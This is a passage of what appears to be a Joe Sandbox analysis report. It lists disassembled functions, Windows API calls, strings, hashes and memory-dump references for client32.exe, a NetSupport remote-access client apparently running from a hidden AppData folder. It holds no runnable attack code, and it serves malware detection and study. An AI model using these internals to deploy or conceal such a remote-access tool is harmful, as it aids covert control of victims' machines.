                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                                                                    • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                                                    • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                                                                    • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                                                                    • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                                                                    Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID: %s%s%s.bin$358075$_HF$_HW$_SW
                                                                                                                                                    • API String ID: 2111968516-1244234249
                                                                                                                                                    • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                                                                    • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                                                                                    • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                                                                    • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                                                                                    Function 6CA96940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96950
                                                                                                                                                      • Part of subcall function 6CA97BE0: _memset.LIBCMT ref: 6CA97BFF
                                                                                                                                                      • Part of subcall function 6CA97BE0: _strncpy.LIBCMT ref: 6CA97C0B
                                                                                                                                                      • Part of subcall function 6CA8A4E0: EnterCriticalSection.KERNEL32(6CACB898,00000000,?,?,?,6CA8DA7F,?,00000000), ref: 6CA8A503
                                                                                                                                                      • Part of subcall function 6CA8A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6CA8A568
                                                                                                                                                      • Part of subcall function 6CA8A4E0: Sleep.KERNEL32(00000000,?,6CA8DA7F,?,00000000), ref: 6CA8A581
                                                                                                                                                      • Part of subcall function 6CA8A4E0: LeaveCriticalSection.KERNEL32(6CACB898,00000000), ref: 6CA8A5B3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                                    • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                                                                    • API String ID: 1112461860-1140593649
                                                                                                                                                    • Opcode ID: a9f2e255c907dfbe475fb4a76646aa6d9a8a12dc3a686c0d2defaf3fbc9abb9c
                                                                                                                                                    • Instruction ID: afe3c5d1c8fe2529517ce0a6abb99fd4137f7e1c4a22521d2a96dba21ffbd248
                                                                                                                                                    • Opcode Fuzzy Hash: a9f2e255c907dfbe475fb4a76646aa6d9a8a12dc3a686c0d2defaf3fbc9abb9c
                                                                                                                                                    • Instruction Fuzzy Hash: BC51F531B1530A8FDB14EEB8D95579A77F5AF0234CF288628D851C3B81EB3096CAC791
                                                                                                                                                    Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                                                                                    • RegisterClassA.USER32(?), ref: 111036EF
                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                    • String ID: NSMDesktopWnd
                                                                                                                                                    • API String ID: 2669163067-206650970
                                                                                                                                                    • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                                                                    • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                                                                                    • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                                                                    • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                                                                                    Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                    • API String ID: 47109696-3245241687
                                                                                                                                                    • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                                                    • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                                                                    • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                                                    • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                                                                    Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                                                                                      • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                                                                                      • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                    • API String ID: 806825551-1858614750
                                                                                                                                                    • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                                                                                    • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                                                                                    • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                                                                                    • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                                                                                    Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                                                      • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                                                                                    • ResetEvent.KERNEL32(00000274), ref: 11144E39
                                                                                                                                                    • SetEvent.KERNEL32(00000274), ref: 11144E4F
                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                    • String ID: MiniDump
                                                                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                                                                    • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                                                    • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                                                                                    • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                                                    • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                                                                                    Function 6CA88E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA85000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CA85014
                                                                                                                                                      • Part of subcall function 6CA85000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA85034
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6CA88EAE
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6CA88EBF
                                                                                                                                                      • Part of subcall function 6CA82420: _strrchr.LIBCMT ref: 6CA8242E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                                                                    • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                                                    • API String ID: 3215810784-3459472706
                                                                                                                                                    • Opcode ID: ef36c41533396668972212cbd0f7244001812c05bd8fb74c8ccc10c0dfb3cfae
                                                                                                                                                    • Instruction ID: 95629c190b245eb0dcb097beeab3f0532670a18a64b890e0b06c6c34efd49fcd
                                                                                                                                                    • Opcode Fuzzy Hash: ef36c41533396668972212cbd0f7244001812c05bd8fb74c8ccc10c0dfb3cfae
                                                                                                                                                    • Instruction Fuzzy Hash: 3D11D375B022159BEB149F50DC45BEA73B4EB05309F044466EE09E7A41EF30EAC8CB71
                                                                                                                                                    Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                                                                                                    • wsprintfA.USER32 ref: 11147A16
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                                                                    • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                                                    • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                                                                                    • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                                                    • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                                                                                    Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                                      • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                                    • wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • _memset.LIBCMT ref: 11110207
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
